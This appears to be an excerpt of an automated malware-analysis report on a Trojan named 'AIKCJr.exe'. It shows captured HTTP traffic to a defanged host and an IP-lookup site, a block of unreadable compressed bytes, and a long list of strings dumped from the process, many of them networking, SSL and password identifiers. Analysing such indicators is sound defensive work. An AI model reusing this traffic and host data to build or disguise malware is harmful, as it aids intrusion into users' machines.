Referer: hXXp://VVV.175sf.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 08 Oct 2016 09:18:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Thu, 23 Jun 2016 10:01:38 GMT
Content-Encoding: gzip
b2a...............n......?..,.....(KZ.....Q.2.J...A...5%...^;.c..T....~@..gZ.y./....sf..(.:....`9.s.s...~.G....7...f.g.x52.g..,]..M|....^. ...]...x^..F.<...o.?Z.... {f.2NnG...}......'.....#.,:.../G.'&...;9.z.9:>._.LN..#c..".:^...-H.0.:y..l..$.W..,./r.\..y.TL&.L.G..-..QF.O.$.(..$.h.f~...8.W..$f....|".8).5.....t...q~..}...Vg..uR:62.....4.w%._B...T...k?....}.....K.M.../.9....o............[........m..jI...a.(..8...n,.To...|F.....(.....I.. ....q&._L..l".'..j. .L-"..2k..sW8@:i.#..W.,-T...:K>.v?'_...}.K.y.}....b..>..Ig`.o........q5........r.w........1;@f}...].0....95...V..`..Q...3.......yH.'.c.NNN.%.t..U....{tK.h:"..1.,..c"`o.EA...r.x..z..1...=U....i%:.p.3..3.1.9..n_.......w.?.n....V... 4....FZ....*Q......r...].g.$.2QZm......g..0.2..k ..s nn.$...S..[..f. ...fi^.T...B..(.$T.3\^ R..wq.....llE}..P..e.W...%._..D...cc.$...R... ..fd,.0.V.......#..w.&.z.`..G] . C.....{.`...G..9....p...r.x.h..N(....:..f.\...@.7..).D..F`#.........f.p....2L.Z.......J.......M.`[...2ZE7.e.d.v..r.. .... .....djV..rZ...=.......d........o?....~...Q..h.......C".=v.o.K...0.~.C(.L...B.......>Z..y'......Q..I.....=Y.J....(^....Uu'...02....\S!..C...Z.... S.~.=\....z.....A.n......S..H.u).L.k.P...<Hb.Y....|u..N..8.....0.\'n......oC`...(....H.l..s....q.[7.`...1t....4.....X.us..~.1...Z.....e...-^t.;.d....3...}F.6......., SPu.V.....e......@...8.r..es.z...*m....5.*.2...h........R.%.^.Zc....4;.=.\.AS..OE..J.;.}.,..YE$.;k.........@]G.i..Ptq...;M...#V.AS.......>;.....-b;....YDH.W.#".@/.w.A......8.a..zH....,(.. `{..E.9...(."...v..F.xW...r...^..
<<< skipped >>>
GET / HTTP/1.1
Host: ip.catr.cn
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 08 Oct 2016 09:18:42 GMT
Content-Length: 2978
<!DOCTYPE html>..<html>..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>......IP........................</title>.. <script src="/Scripts/jquery-1.9.1.min.js" type="text/javascript"></script>.. <script src="/Scripts/RouteInfo/Index.js" type="text/javascript"></script>.. <style type="text/css">.. a {.. text-decoration: none;.. }.. </style>..</head>..<body>.. <div style="width: 1000px; margin:auto;">.. <div>.. <img src="/Content/images/IPm_01.jpg" width="262" height="97" style="float:left;" /><img src="/Content/images/IPm_02.jpg" width="738" height="97" style="float:left;" /> .. </div>.. <div style="clear:both;"></div>.. <div style="width: 452px; margin-top: 89px; margin-left:auto; margin-right: auto;">.. <img src="/Content/images/IPm_06.jpg" width="452" height="47" />.. </div>.. <div style="margin-top: 67px; margin-left:auto; margin-right:auto; width: 357px;">..<form action="/Home/Context" id="search-form" method="post"> <table cellpadding="0" cellspacing="0">.. <tr>.. <td style="width: 287px;">.. <input type="text" id="searchKeyword" name="keyword" style="height:29px;width:270px;" value=".....................
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
AIKCJr.exe_1224:
`.rsrc
`.rsrc
kernel32.dll
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
u%CNu
u%CNu
%s[%d]
%s[%d]
1.2.8
1.2.8
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
WS2_32.DLL
WS2_32.DLL
127.0.0.1
127.0.0.1
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsU
TIdStackWindowsU
IdStackWindows
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
TIdEncoder3to4.Encode: Calculated length not met (expected
password
password
Password
Password
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPassword
ProxyPassword
ProxyPort
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
ClientPortMin
ClientPortMin
ClientPortMax
ClientPortMax
Port
Port
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
EIdInvalidPortRangeSVW
libeay32.dll
libeay32.dll
ssleay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
X509_STORE_CTX_get_current_cert
des_set_key
des_set_key
saUsernamePassword
saUsernamePassword
Password
Password
0.0.0.1
0.0.0.1
TIdTCPConnection
TIdTCPConnection
TIdTCPConnection0
TIdTCPConnection0
IdTCPConnection
IdTCPConnection
EIdTCPConnectionError
EIdTCPConnectionError
Vh8%C
Vh8%C
Uh %C
Uh %C
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
TPasswordEvent
TPasswordEvent
Certificate
Certificate
RootCertFile
RootCertFile
CertFile
CertFile
KeyFile|3C
KeyFile|3C
OnGetPassword
OnGetPassword
EIdOSSLLoadingRootCertErrorH?C
EIdOSSLLoadingRootCertErrorH?C
EIdOSSLLoadingCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClient
IdTCPClient
IdTCPClient
BoundPort
BoundPort
PortU
PortU
CommentURL
CommentURL
TIdHTTPMethod
TIdHTTPMethod
IdHTTP
IdHTTP
TIdHTTPOption
TIdHTTPOption
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
IdHTTPp
IdHTTPp
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPResponse8
TIdHTTPResponse8
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPProtocol
TIdHTTPProtocol
TIdCustomHTTP
TIdCustomHTTP
TIdHTTP
TIdHTTP
TIdHTTP4
TIdHTTP4
HTTPOptionsl
HTTPOptionsl
EIdHTTPProtocolException
EIdHTTPProtocolException
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTPS
HTTPS
https
https
This request method is supported in HTTP 1.1
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
%d.%d.%d.%d
%d.%d.%d.%d
;8=$:$:$;
;8=$:$:$;
b~~z0%%cz$ik~x$id%
b~~z0%%cz$ik~x$id%
KERNEL32.DLL
KERNEL32.DLL
NTDLL.DLL
NTDLL.DLL
TIdUDPBase
TIdUDPBase
IdUDPBase
IdUDPBase
255.255.255.255
255.255.255.255
TIdUDPClient
TIdUDPClient
IdUDPClient
IdUDPClient
Port
Port
&tn
&tn
&tn
&tn
&unc
&unc
&vendor
&vendor
&
&
&
&
&
&
&
&
&&
&&
&
&
&
&
&
&
&Error
&Error
&
&